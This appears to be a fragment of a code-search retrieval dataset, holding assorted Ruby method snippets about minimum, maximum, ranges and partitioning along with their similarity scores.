"def insert range_first, value\n @values[range_first] = value\n lowers = @values.keys.sort\n uppers = @values.keys.sort\n lowers.pop\n uppers.shift\n @ranges = []\n for i in 0...lowers.size do\n @ranges << (lowers[i]...uppers[i])\n end\n end",
"def range=(range)\n @range = range\n end",
"def range(range)\n opts[:min] = range.begin\n opts[:max] = range.end\n end",
"def minimum\n Minimum.new(self)\n end",
"def peek_min\n if next_head = self.head.sibling\n current_head = self.head\n while next_head \n next_head < current_head ? @min = next_head : @min = current_head\n current_head = next_head\n next_head = next_head.sibling \n end\n else\n @min = self.head\n end\n @min\n end",
"def set_rating_range range = nil\n raterange = case range\n when Array\n arr = range.sort\n Range.new arr.first, arr.last\n when Range\n range\n when nil\n (1..5)\n else\n raise ArgumentError, \"Must be a range, was: #{range}\"\n end\n\n (class << self; self; end).send(:define_method, :rating_range) do\n raterange\n end\n end",
"def min_value_quarter_sheet(value)\n only_values = self.class.only_values\n min = only_values.first\n only_values.each do |only_value|\n if only_value <= value\n min = only_value\n else\n break\n end\n end\n {:base_value => base_value,:value_quarter_sheet =>min ,:t => eval(\"v_#{min}_t\"),:tr => eval(\"v_#{min}_tr\")}\n end",
"def min_point\n # generate the bounding box if not already done\n bounding_box\n # return the min\n @min\n end",
"def min()\n return MicrosoftGraph::Drives::Item::Items::Item::Workbook::Functions::Min::MinRequestBuilder.new(@path_parameters, @request_adapter)\n end",
"def minimum_value\n @minimum_value || store.min\n end",
"def clamp(value, minimum_inclusive, maximum_inclusive)\n\n if minimum_inclusive > maximum_inclusive\n\n swap = minimum_inclusive\n\n minimum_inclusive = maximum_inclusive\n maximum_inclusive = swap\n end\n\n value < minimum_inclusive ? minimum_inclusive : value < maximum_inclusive ? value : maximum_inclusive\n end",
"def minimum_beds(beds)\n set_limiting_value(:minimum, :beds, beds)\n end",
"def add_leading_range\n @allocated_ranges.prepend((0..0))\n try_to_join_leading_ranges\n 0\n end",
"def start\n @min\n end",
"def get_min\n @min\n end",
"def get_min()\n @min\n end",
"def enlarge(growth)\r\n if @range.none?\r\n @range = 0...growth\r\n else\r\n @range = (@range.min)..(@range.max + growth)\r\n end\r\n end",
"def range=(range)\n @range = Range.new(range)\n end",
"def min(field)\n determine(field, :<=)\n end",
"def get_min()\n end",
"def setLowHigh(low, high)\n # Make sure the values aren't out of bounds.\n if low <= high\n @low = low\n @high = high\n elsif low > high\n @low = high\n @high = low\n end\n\n # Make sure the user hasn't done something silly.\n self.limitCurrentValue\n end",
"def get_min()\n @min \n end",
"def my_min_once\n min = first\n each do |num|\n if num < min\n min = num\n end\n end\n min\n end",
"def find_min()\r\n self.min\r\n end",
"def min_tb_rangeF; @min_sf; end",
"def extend_leading_range\n id = @allocated_ranges[0].last.succ\n @allocated_ranges[0] = (@allocated_ranges[0].first..@allocated_ranges[0].last.succ)\n try_to_join_leading_ranges\n id\n end",
"def find_min\n loc = find_min_locator and loc.value\n end",
"def smallest_range_i(a, k)\n result = a.max - a.min - 2 * k\n result >= 0 ? result : 0\nend",
"def set_MinCount(value)\n set_input(\"MinCount\", value)\n end",
"def set_MinCount(value)\n set_input(\"MinCount\", value)\n end",
"def get_range_start(code_point, block_data)\n start_data = block_data[block_data.keys.min]\n\n if start_data[1] =~ /<.*, First>/\n start_data = start_data.clone\n start_data[0] = code_point\n start_data[1] = start_data[1].sub(', First', '')\n start_data\n end\n end",
"def <=>(other) range_start <=> other.range_start end",
"def min_value(value, pdef)\n if(value.to_i >= pdef['MinValue'].to_i)\n true\n else\n \"Value must not be less than #{pdef['MinValue']}\"\n end\n end",
"def find_min_from_range(segment_arr, qlow, qhi, low, hi, pos)\n if(qlow <= low && qhi >= hi) # total overlap\n return segment_arr[pos]\n elsif(qlow > hi || qhi < low) # No Overlap\n return Integer::INFINITY\n end\n\n mid = (low+hi)/2\n [find_min_from_range(segment_arr, qlow, qhi, low, mid, pos*2+1),\n find_min_from_range(segment_arr, qlow, qhi, mid+1, hi, pos*2+2)].min\nend",
"def min(field = nil)\n block_given? ? super() : aggregates(field)[\"min\"]\n end",
"def min (row_num)\n row = @rows[row_num]\n min = row[0]\n row.each do |num|\n if min == 0 then\n min = num\n end\n if (num < min) && (num != 0) then\n min = num\n end\n end\n return min\n end",
"def min(x, s) \n\tif x < s\n\t\treturn x\n\tend\n \t\n\treturn s\nend",
"def minimum_coverage(val)\n raise \"minimum_coverage requires a Float.\" unless val.is_a? Float\n raise \"minimum_coverage must be between 0 and 100\" unless val.between?(0, 100)\n @minimumCoverage = val\n self\n end",
"def minimum_attendee_percentage=(value)\n @minimum_attendee_percentage = value\n end",
"def add_partition_to_all_lowest( tp, nb_partitions_to_add )\n\n nodes_sizes_replicas = @nodes_lists_replicas.hmap { |k,v| { k => v.size } }\n nodes_lowest = nodes_sizes_replicas.sort_by{|k,v| v}.map { |a| a[0] }\n\n nodes_lowest.each do |node|\n break if nb_partitions_to_add <= 0\n\n unless @nodes_lists_replicas[node].has_key?(tp)\n add_partition_to_node( tp, node )\n nb_partitions_to_add -= 1\n end\n end\n end",
"def minimum\n return @minimum\n end",
"def range=(aRange)\n range.assign(aRange)\n end",
"def min=(newmin)\n newmin = newmin.to_i\n raise ArgumentError, \"Invalid minute: '#{newmin}'.\" if newmin < 0 or newmin > 60\n @t_min = newmin\n end",
"def range\n @range ||= 0.upto(@limit)\n end",
"def min(series, control, ignore=nil)\n each_subseries_in series, control do |name, subseries|\n { :min => subseries.values.sort.first }\n end\n end",
"def start\n @range.start\n end",
"def better_my_min\n min = self.first\n self.each do |el|\n min = el if el < min\n end\n min\n end",
"def set_FirstYearRange(value)\n set_input(\"FirstYearRange\", value)\n end",
"def set_FirstYearRange(value)\n set_input(\"FirstYearRange\", value)\n end",
"def set_FirstYearRange(value)\n set_input(\"FirstYearRange\", value)\n end",
"def original_scheduling_initial!(partitions)\n # Phase 1: Sort partitions by sites.size\n partitions.sort_by_sites!\n\n # Phase 2: Initial filling\n bin_assigner = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_assigner].total_sites + partitions.first.sites.size <= @sites_lower_bound\n @list[bin_assigner].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_assigner].total_sites == @sites_lower_bound\n full_bins += 1\n @sites_lower_bound -= 1 if full_bins == @list.size - @sites_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_assigner = (bin_assigner + 1) % @list.size\n end\n partitions\n end",
"def set_MinResult(value)\n set_input(\"MinResult\", value)\n end",
"def adapted_scheduling_initial!(partitions)\n bin_index = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_index].size + partitions.first.size <= @operations_lower_bound\n @list[bin_index].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_index].size == @operations_lower_bound\n full_bins += 1\n @operations_lower_bound -= 1 if full_bins == @list.size - @operations_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_index = (bin_index + 1) % @list.size\n end\n @list = @list.sort\n\n partitions\n end",
"def restrict(value, range)\n [[value, range.first].max, range.last].min\n end",
"def clamp(x, low, hi)\n x = low if x < low\n x = hi if x > hi\n return x\n end",
"def set_min_max_price_values\n price_facet_rows = @products.facet(:price).rows.sort_by{|row| row.value}\n @min_price = price_facet_rows.first.try(:value) || 0\n @max_price = price_facet_rows.last.try(:value) || 1000\n end",
"def minimum(arr)\n m = arr.min\n m\n end",
"def my_min(list)\n min = list.first \n\n list.each do |el|\n if el < min \n min = el \n end\n end\n min\nend"
] |
[
"0.72577417",
"0.72577417",
"0.71424174",
"0.7122371",
"0.70912755",
"0.69917667",
"0.6888057",
"0.6812013",
"0.68096876",
"0.6666901",
"0.6399381",
"0.6349612",
"0.62588686",
"0.6254483",
"0.6244712",
"0.62080765",
"0.62066627",
"0.61895996",
"0.61192626",
"0.61116827",
"0.6065698",
"0.5983066",
"0.5977896",
"0.58864456",
"0.58864456",
"0.58670485",
"0.58634937",
"0.5829765",
"0.58295244",
"0.5826287",
"0.5807269",
"0.57971734",
"0.5788579",
"0.57813066",
"0.57813066",
"0.57783777",
"0.5753838",
"0.57507",
"0.5739273",
"0.57259023",
"0.57259023",
"0.5709252",
"0.5685153",
"0.567869",
"0.56705457",
"0.5650436",
"0.5630738",
"0.5618182",
"0.5616466",
"0.5609898",
"0.5586828",
"0.557924",
"0.55782866",
"0.5571625",
"0.5549059",
"0.55483216",
"0.5544486",
"0.5543351",
"0.5542388",
"0.55332893",
"0.552464",
"0.5523531",
"0.55144787",
"0.54985976",
"0.5495805",
"0.54803014",
"0.5478239",
"0.5459564",
"0.5458796",
"0.5454088",
"0.54518783",
"0.5446221",
"0.5446221",
"0.54452914",
"0.54424614",
"0.54413784",
"0.54323006",
"0.5431522",
"0.5410785",
"0.5401641",
"0.5401583",
"0.5398301",
"0.5392312",
"0.53894955",
"0.5387205",
"0.53723204",
"0.53695905",
"0.53679675",
"0.53608763",
"0.53498113",
"0.5347985",
"0.5347985",
"0.5347985",
"0.5344269",
"0.53399533",
"0.53294367",
"0.5321101",
"0.5316585",
"0.53061503",
"0.5299774",
"0.52981824"
] |
0.0
|
-1
|
Assumes range partitioning, sets the exclusive maximum value of the range for this partition.
|
def to(*v)
@to = v
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def max_range=(range)\n @max_range = [0, range].max\n @min_range = [@min_range, @max_range].min\n end",
"def set_max( max )\n if IntegerOption.bounds_ok?( @min, max )\n @max = max\n else\n @max = nil\n raise \"invalid upper bound: #{ max.to_s }\"\n end\n end",
"def max\r\n @range.max\r\n end",
"def max\n @range.end\n end",
"def min_range=(range)\n @min_range = [0, range].max\n @max_range = [@min_range, @max_range].max\n end",
"def max(upper_bound, inclusive = nil)\n @max = upper_bound\n @max_inclusive = inclusive\n end",
"def max(upper_bound, inclusive = nil)\n @max = upper_bound\n @max_inclusive = inclusive\n end",
"def set_Maximum(value)\n set_input(\"Maximum\", value)\n end",
"def get_max_range\n return @maxRange\n end",
"def set_max(max)\n self[:max] = (max > 0 ? max : 1)\n end",
"def max\n @max ||= define_min_and_max && @max\n end",
"def max\n if @end.nil?\n ::Kernel.raise ::RangeError, 'cannot get the maximum of endless range'\n elsif block_given?\n super\n elsif !@begin.nil? && (@begin > @end ||\n @excl && @begin == @end)\n nil\n else\n `#{@excl} ? #{@end} - 1 : #{@end}`\n end\n end",
"def maximum=(value)\n @maximum = value\n end",
"def max(value)\n opts[:max] = value\n end",
"def range=(range)\n @range = range\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def set_Max(value)\n set_input(\"Max\", value)\n end",
"def max=(value)\r\n @max = value\r\n shift while @store.length > @max\r\n end",
"def range\n @range ||= set_range\n end",
"def setLowHigh(low, high)\n # Make sure the values aren't out of bounds.\n if low <= high\n @low = low\n @high = high\n elsif low > high\n @low = high\n @high = low\n end\n\n # Make sure the user hasn't done something silly.\n self.limitCurrentValue\n end",
"def range=(range)\n @range = range\n end",
"def set_value( value )\n if value == nil\n return\n end\n \n value = value.to_i\n \n satisfying_min = ((get_min == nil) or ((get_min != nil) and (get_min <= value)))\n satisfying_max = ((get_max == nil) or ((get_max != nil) and (value <= get_max)))\n \n if satisfying_min and satisfying_max\n @value = value\n else\n raise \"integer value out of range: #{ value.to_s }\"\n end\n end",
"def max=(max)\n diff = nil\n @mutex.synchronize {\n if max <= @max\n @max = max\n else\n diff = max - @max\n @max = max\n end\n }\n if diff\n diff.times do\n\tbegin\n\t t = @queue_wait.shift\n\t t.run if t\n\trescue ThreadError\n\t retry\n\tend\n end\n end\n max\n end",
"def max=(max)\n diff = nil\n @mutex.synchronize {\n if max <= @max\n @max = max\n else\n diff = max - @max\n @max = max\n end\n }\n if diff\n diff.times do\n\tbegin\n\t t = @queue_wait.shift\n\t t.run if t\n\trescue ThreadError\n\t retry\n\tend\n end\n end\n max\n end",
"def enlarge(growth)\r\n if @range.none?\r\n @range = 0...growth\r\n else\r\n @range = (@range.min)..(@range.max + growth)\r\n end\r\n end",
"def range\n @range ||= 0.upto(@limit)\n end",
"def max=(value)\n MSPhysics::Newton::Hinge.set_max(@address, value)\n end",
"def max=\n end",
"def get_upper_limit_of(range)\n range.max\nend",
"def item_max=(value)\n @item_max = value\n end",
"def SetRange(range)\n @range=range\n end",
"def range=(range)\n @range = Range.new(range)\n end",
"def update(range)\n @access.update(range.min, range.max)\n end",
"def get_upper_limit_of(range)\n range.max\nend",
"def upto(end_key)\n unless partition_specified?\n raise IllegalQuery,\n \"Can't construct exclusive range on partition key #{range_key_name}\"\n end\n scoped(upper_bound: bound(false, true, end_key))\n end",
"def high\n @range_high\n end",
"def range=(aRange)\n range.assign(aRange)\n end",
"def max\n [self.begin, self.end].max\n end",
"def clamp(value, minimum_inclusive, maximum_inclusive)\n\n if minimum_inclusive > maximum_inclusive\n\n swap = minimum_inclusive\n\n minimum_inclusive = maximum_inclusive\n maximum_inclusive = swap\n end\n\n value < minimum_inclusive ? minimum_inclusive : value < maximum_inclusive ? value : maximum_inclusive\n end",
"def range(range)\n opts[:min] = range.begin\n opts[:max] = range.end\n end",
"def position_max=(new_position_max)\n Klass.setPositionMax(@handle, @index, new_position_max.to_f)\n new_position_max\n end",
"def max_range(array)\n \nend",
"def unbounded\n ::Unbounded::Range.new(self.min, self.max, exclude_end?)\n end",
"def update!(**args)\n @max_value = args[:max_value] if args.key?(:max_value)\n @min_value = args[:min_value] if args.key?(:min_value)\n end",
"def update!(**args)\n @max_value = args[:max_value] if args.key?(:max_value)\n @min_value = args[:min_value] if args.key?(:min_value)\n end",
"def effective_maximum\n maximum_bound ? maximum_bound.value : Infinity\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def update!(**args)\n @max = args[:max] if args.key?(:max)\n @min = args[:min] if args.key?(:min)\n end",
"def SetIDRange(min, max)\n assert { min.instance_of?(Fixnum) or min.instance_of?(Bignum) }\n assert { max.instance_of?(Fixnum) or max.instance_of?(Bignum) }\n assert { min <= max }\n\n @min_id = min\n @max_id = max\n end",
"def range\n object.range + DEFAULT_MAX_DISTANCE\n end",
"def vote_range=(val)\n raise ArgumentError, 'argument should be a Range' unless val.is_a?(Range)\n @vote_range = val\n end",
"def restrict(value, range)\n [[value, range.first].max, range.last].min\n end",
"def set(max, position)\n @max = max\n @number = 1\n @cursor_y = position\n refresh\n end",
"def set_bounds( min, max )\n set_min( min )\n set_max( max )\n end",
"def max_range(array)\r\n\r\n array.max - array.min # max and min methods used\r\nend",
"def maximized(value)\n @ole.Maximized = value\n nil\n end",
"def maximized(value)\n @ole.Maximized = value\n nil\n end",
"def max\n if valid?\n max_value\n end\n end",
"def set_max_min(grouplisthash)\n @maxscore.each do |scorekey, val|\n @chromhash.each do |chrnum, chrom|\n chrom.snp_list.snps.each do |snp|\n snp.results.each do |groupname, res|\n if groupname !~ /:/\n currgroup = grouplisthash[GroupList.get_default_name].grouphash[groupname]\n else\n namepcs = groupname.split /:/\n currgroup = grouplisthash[namepcs[1]].grouphash[groupname]\n end\n\n if (scorekey =~ /beta/i and currgroup.has_beta?) or scorekey !~ /beta/i\n if res.values[scorekey] !~ /\\d/\n next\n end\n if res.values[scorekey].to_f > @maxscore[scorekey].to_f\n @maxscore[scorekey] = res.values[scorekey]\n end\n if res.values[scorekey].to_f < @minscore[scorekey].to_f\n @minscore[scorekey] = res.values[scorekey]\n end\n end\n end\n end\n end\n end\n end",
"def max_energy=(energy)\n @max_energy = [0, energy].max\n end",
"def check_new_max(product)\n if product > @max\n @max = product\n end \nend",
"def max_health=(health)\n diff = [health - @max_health, 0].max\n @max_health = [health, 0].max\n @cur_health = [@cur_health + diff, @max_health].min\n end",
"def set_MaxEntries(value)\n set_input(\"MaxEntries\", value)\n end",
"def replace_max(value, priority=value, subpriority=nil)\n subpriority ||= @totalcount\n @totalcount += 1\n loc = find_max_locator\n loc.update(value, priority, subpriority)\n loc\n end",
"def upper_bound_inclusive\n result = upper_bound\n\n # Some special cases:\n # - return a semver \"off-the-charts\" if the upper bound is 0.0.0\n # - deal with ranges that are not really ranges (like =v1.2.3)\n # - The \"biggest semver\" is its own upper bound\n return IMPOSSIBLY_SMALLEST_SEMVER if result.to_a[0...3] == [0, 0, 0]\n return result if upper_bound == lower_bound\n return result if result == XSemVer::BIGGEST_SEMVER\n\n # Figure out the part to decrement, taking care that we can't decrement\n # a part that is already at 0\n index_to_decrement = 2\n while result.to_a[index_to_decrement] == 0 do\n index_to_decrement -= 1\n end\n\n part_to_decrement = [:major, :minor, :patch][index_to_decrement]\n\n # Dynamically decrement the specified part\n value = result.send(part_to_decrement) - 1\n result.send \"#{part_to_decrement}=\", value\n\n # All the parts following the decremented one will be set to infinity\n parts_to_set_to_infinity = [:major, :minor, :patch][index_to_decrement + 1...3]\n\n parts_to_set_to_infinity.each do |part|\n result.send \"#{part}=\", FIXNUM_MAX\n end\n\n result\n end",
"def within_size_range=(value)\n @within_size_range = value\n end",
"def range(min, max)\n return max if max < min\n range(min, max) << max\nend",
"def set_rating_range range = nil\n raterange = case range\n when Array\n arr = range.sort\n Range.new arr.first, arr.last\n when Range\n range\n when nil\n (1..5)\n else\n raise ArgumentError, \"Must be a range, was: #{range}\"\n end\n\n (class << self; self; end).send(:define_method, :rating_range) do\n raterange\n end\n end",
"def max; end",
"def max; end",
"def maxvalue\n MAXVALUE\n end",
"def change_ranges(params)\n @min = params.fetch(:min, 0).to_f\n @max = params.fetch(:max, 100).to_f\n end",
"def update_range\n @min = [@guess + 1, @max].min if @guess < @answer\n\n @max = [@guess - 1, @min].max if @guess >= @answer\n \n return\n end",
"def set_LastYearRange(value)\n set_input(\"LastYearRange\", value)\n end",
"def set_LastYearRange(value)\n set_input(\"LastYearRange\", value)\n end",
"def set_LastYearRange(value)\n set_input(\"LastYearRange\", value)\n end",
"def zremrangebyscore(key, min, max); end",
"def zremrangebyscore(key, min, max); end",
"def max_tb_rangeF; @max_sf; end",
"def m_range\r\n end",
"def minmax\n [min, unbounded? ? INFINITY : max]\n end",
"def set(item, max)\n @item = item\n @max = max\n @number = 1\n refresh\n end",
"def set_cluster_group_ranges\n if self.file_type == 'Cluster' && self.cluster_groups.any?\n cluster = self.cluster_groups.first\n # check if range values are present and set accordingly\n if !self.x_axis_min.nil? && !self.x_axis_max.nil? && !self.y_axis_min.nil? && !self.y_axis_max.nil?\n domain_ranges = {\n x: [self.x_axis_min, self.x_axis_max],\n y: [self.y_axis_min, self.y_axis_max]\n }\n if !self.z_axis_min.nil? && !self.z_axis_max.nil?\n domain_ranges[:z] = [self.z_axis_min, self.z_axis_max]\n end\n cluster.update(domain_ranges: domain_ranges)\n else\n # either user has not supplied ranges or is deleting them, so clear entry for cluster_group\n cluster.update(domain_ranges: nil)\n end\n end\n end",
"def get_max\n @max ||= calculate_max\n end",
"def clamp(val, min, max)\n\treturn min if val < min\n\treturn max if val > max\n\treturn val\nend",
"def update!(**args)\n @exclusive_maximum = args[:exclusive_maximum] if args.key?(:exclusive_maximum)\n @exclusive_minimum = args[:exclusive_minimum] if args.key?(:exclusive_minimum)\n @maximum = args[:maximum] if args.key?(:maximum)\n @minimum = args[:minimum] if args.key?(:minimum)\n end",
"def get_upper_limit_of(range)\n range.last\nend"
] |
[
"0.7247103",
"0.6731997",
"0.6690845",
"0.6576741",
"0.65313303",
"0.6524582",
"0.6524582",
"0.64506906",
"0.63527775",
"0.632476",
"0.62763554",
"0.6214056",
"0.6212238",
"0.6170544",
"0.6155219",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.61088014",
"0.6070612",
"0.6056904",
"0.6033674",
"0.6022585",
"0.5950167",
"0.5919765",
"0.5919765",
"0.59154564",
"0.5897935",
"0.5881222",
"0.5871674",
"0.5867126",
"0.58622926",
"0.5860082",
"0.5860026",
"0.58464134",
"0.5837987",
"0.58075523",
"0.57855535",
"0.57629216",
"0.5740042",
"0.57272285",
"0.57163244",
"0.57092637",
"0.57058203",
"0.5687706",
"0.5679261",
"0.5675895",
"0.5655217",
"0.5648699",
"0.5648699",
"0.5648699",
"0.5648699",
"0.5648699",
"0.5648699",
"0.5648699",
"0.5647969",
"0.5647969",
"0.5647861",
"0.56455386",
"0.56416047",
"0.5608837",
"0.560871",
"0.5606977",
"0.5583639",
"0.55779123",
"0.55779123",
"0.55755484",
"0.5571267",
"0.5558885",
"0.5513895",
"0.5512015",
"0.5505471",
"0.549946",
"0.54963565",
"0.5495369",
"0.5453825",
"0.54450107",
"0.5440428",
"0.5440428",
"0.5435354",
"0.5432699",
"0.54207766",
"0.54170895",
"0.54170895",
"0.54170895",
"0.541566",
"0.541566",
"0.54126626",
"0.5403936",
"0.5399133",
"0.538272",
"0.5375385",
"0.53692997",
"0.53682595",
"0.53667915",
"0.536129"
] |
0.0
|
-1
|
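The from and to setters above, together with the minvalue/maxvalue records, suggest a small builder-style DSL for declaring range partitions. A minimal sketch of how such a builder might fit together, assuming a hypothetical RangePartition class; only the from/to/minvalue/maxvalue method shapes come from the records above, everything else is illustrative:

class RangePartition
  # Illustrative sentinels; in the source these come from MINVALUE/MAXVALUE constants.
  MINVALUE = :minvalue
  MAXVALUE = :maxvalue

  attr_reader :from_values, :to_values

  # Inclusive lower bound of the range (mirrors def from(*v) above).
  def from(*v)
    @from_values = v
  end

  # Exclusive upper bound of the range (mirrors def to(*v) above).
  def to(*v)
    @to_values = v
  end

  # Sentinel for the type's minimum, usable as a from argument.
  def minvalue
    MINVALUE
  end

  # Sentinel for the type's maximum, usable as a to argument.
  def maxvalue
    MAXVALUE
  end
end

# Usage: an open-ended final partition from 1000 up to the type maximum.
part = RangePartition.new
part.from(1000)
part.to(part.maxvalue)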
Assumes list partitioning, sets the values to be included in this partition.
|
def values_in(*v)
@in = v
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def partition_list()\nend",
"def add!(partition, dirty = false)\n if @list[partition.name].nil?\n @list[partition.name] = partition\n else\n @list[partition.name].merge!(partition, simulate = false, dirty)\n end\n self\n end",
"def set(values); end",
"def set(partition, field, value)\n partition = deep_copy(partition)\n value = deep_copy(value)\n AutoinstCommon.set(@fields, partition, field, value)\n end",
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def on_partitions_assigned(_, partitions)\n @assigned_partitions = partitions.to_h.transform_values { |part| part.map(&:partition) }\n @changed = true\n end",
"def foreign_keys(*partition_key_values)\n return collect_from_collection(*partition_key_values, &:foreign_keys).inject(Set.new) do |set,new_items|\n if new_items.is_a? Array\n set += new_items\n else\n set += [new_items]\n end\n set\n end\n end",
"def assign_parts(hash={})\n return if hash.nil? or hash == {}\n self.parts = []\n hash ||= {}\n hash.each do |h|\n i = self.vendor.items.visible.find_by_sku(h[:sku])\n if i then\n i.is_part = true\n i.part_quantity = self.string_to_float(h[:part_quantity])\n result = i.save\n if result == false\n raise \"Could not save Item because #{ i.errors.messages }\"\n end\n self.parts << i\n end\n end\n result = self.save\n if result == false\n raise \"Could not save Item because #{ self.errors.messages }\"\n end\n end",
"def sort!\n @list = Hash[@list.sort_by {|partition_name, partition| partition}]\n self\n end",
"def partition_linked_list(linked_list, partition_value)\n test_node = linked_list.head.next\n until test_node.next.value == nil\n if test_node.value < partition_value\n next_node = test_node.next\n linked_list.prepend(test_node.value)\n linked_list.remove(test_node)\n test_node = next_node\n else\n test_node = test_node.next\n end\n end\n linked_list\nend",
"def set_values(*items)\r\n items = *items\r\n @value = [nil]\r\n items.each do |item|\r\n @value.push(item)\r\n end\r\n end",
"def update!(**args)\n @partition_count = args[:partition_count] if args.key?(:partition_count)\n end",
"def add_partition_to_all_lowest( tp, nb_partitions_to_add )\n\n nodes_sizes_replicas = @nodes_lists_replicas.hmap { |k,v| { k => v.size } }\n nodes_lowest = nodes_sizes_replicas.sort_by{|k,v| v}.map { |a| a[0] }\n\n nodes_lowest.each do |node|\n break if nb_partitions_to_add <= 0\n\n unless @nodes_lists_replicas[node].has_key?(tp)\n add_partition_to_node( tp, node )\n nb_partitions_to_add -= 1\n end\n end\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def ___set_includes\n ___upd_valid\n each_value do |item|\n next unless (ary = item.delete(:include))\n ary.each do |ref|\n item.get(:group) { Hashx.new }.update(self[ref][:group])\n end\n end\n end",
"def partition(list, left, right, pivotIndex)\n pivotValue = list[pivotIndex]\n list[pivotIndex], list[right] = list[right], list[pivotIndex]\n storeIndex = left\n for i in (left...right) do\n if list[i] < pivotValue\n list[storeIndex], list[i] = list[i], list[storeIndex]\n storeIndex += 1\n end\n end\n list[right], list[storeIndex] = list[storeIndex], list[right]\n storeIndex\nend",
"def set_value_list\n @value_list = ValueList.find(params[:id])\n end",
"def set_list(list)\n @item_list = list\n end",
"def propagate_to_existing_lists=(value)\n @propagate_to_existing_lists = value\n end",
"def assign(config, values)\n if key\n nest_config = nest(config)\n\n unless assigned\n nest_config[key] = []\n end\n\n array = (nest_config[key] ||= [])\n array.concat(values)\n end\n\n @assigned = true\n config\n end",
"def sort_by_site_range!\n @list = Hash[@list.sort_by {|partition_name, partition| partition.sites}]\n self\n end",
"def update!(**args)\n @partition_key = args[:partition_key] if args.key?(:partition_key)\n end",
"def []=(*key_list, value)\n store_with_init(Array(key_list).flatten, value)\n end",
"def list=(pl)\n\n list = get_list\n\n list['list'] = pl.collect { |e|\n ParticipantEntry.read(e)\n }.collect { |e|\n e[0] = e[0].source if e[0].is_a?(Regexp)\n e\n }\n\n if r = @context.storage.put(list)\n #\n # put failed, have to redo it\n #\n self.list=(pl)\n end\n end",
"def list=(value)\n @list = value\n end",
"def add_to_partition(cand, match, partition)\n if !match.nil?\n partition[match] << cand\n @ident_viol_candidates = true\n else\n partition << [cand]\n end\n end",
"def partition(&block) # :nodoc:\n resolve\n result = @items.partition(&block)\n [\n PropertyGroup::PathList.new.import(result[0]),\n PropertyGroup::PathList.new.import(result[1]),\n ]\n end",
"def including_topics_list=(names)\n self.includes_topics.clear\n names.split(',').each do |name|\n topic = Topic.find_by_name(name.downcase.strip)\n self.includes_topics << topic if topic\n end\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def partition(&block)\n return to_enum :partition unless block\n\n ary_T = []\n ary_F = []\n self.each{|*val|\n if block.call(*val)\n ary_T.push(val.__svalue)\n else\n ary_F.push(val.__svalue)\n end\n }\n [ary_T, ary_F]\n end",
"def set(list, list_size, numbers, highlight, box)\n self.setItems(list, list_size, numbers)\n self.setHighlight(highlight)\n self.setBox(box)\n end",
"def sites\n @list.map {|partition_name, partition| partition.sites.map {|site| {site => partition_name} }}.flatten(1)\n end",
"def setList( list)\n @groupList = list\n # calculate minimum bbox to contain the list\n b = @groupList[0].bbox\n @groupList.each { |i| b = self.unite( b, i.bbox) }\n\n # turn off item bindings for items in group\n bindings = self.getBindings\n @groupList.each { |i|\n bindings.each { |p| i.bind p[0], proc { |event| } } # the null proc ...\n }\n\n\t\t# add the UONGroupingBox tag to each of the contained items\n\t\tc = editor.getModelCanvas\n\t\tc.addtag_enclosed( self.gettag, b[0], b[1], b[2], b[3])\n\n # establish bbox of group\n self.coords( b[0], b[1], b[2], b[3])\n outline \"purple\"\n\t\tputs \"LEAVE setList of #{self}\"\n end",
"def call(value)\n coerced = value.map { |item| super(item) }\n\n @set ? Set.new(coerced) : coerced\n end",
"def update!(**args)\n @values = args[:values] if args.key?(:values)\n @pivot_value_regions = args[:pivot_value_regions] if args.key?(:pivot_value_regions)\n end",
"def sort_by_sites!\n @list = Hash[@list.sort_by {|partition_name, partition| partition.sites.size}]\n self\n end",
"def partition(linkedlist, x)\n # Use select block function to create arrays with correct values\n lessThanX = linkedlist.select { |val| val < x }\n moreThanX = linkedlist.select { |val| val >= x }\n # Return values greater than or equal to x appended to values lesser than x\n return lessThanX + moreThanX\nend",
"def greedy2_fill!(remaining_partitions)\n remaining_partitions.each do |src_partition|\n src_partition.sites.each do |site|\n\n smallest_bin = self.update_bin_sizes!.min\n target_partition = smallest_bin.list[src_partition.name]\n if target_partition.nil?\n smallest_bin.add!([Partition.new(src_partition.name, [site], src_partition.tree)])\n else\n target_partition.incr_add_sites!([site])\n end\n\n end\n end\n end",
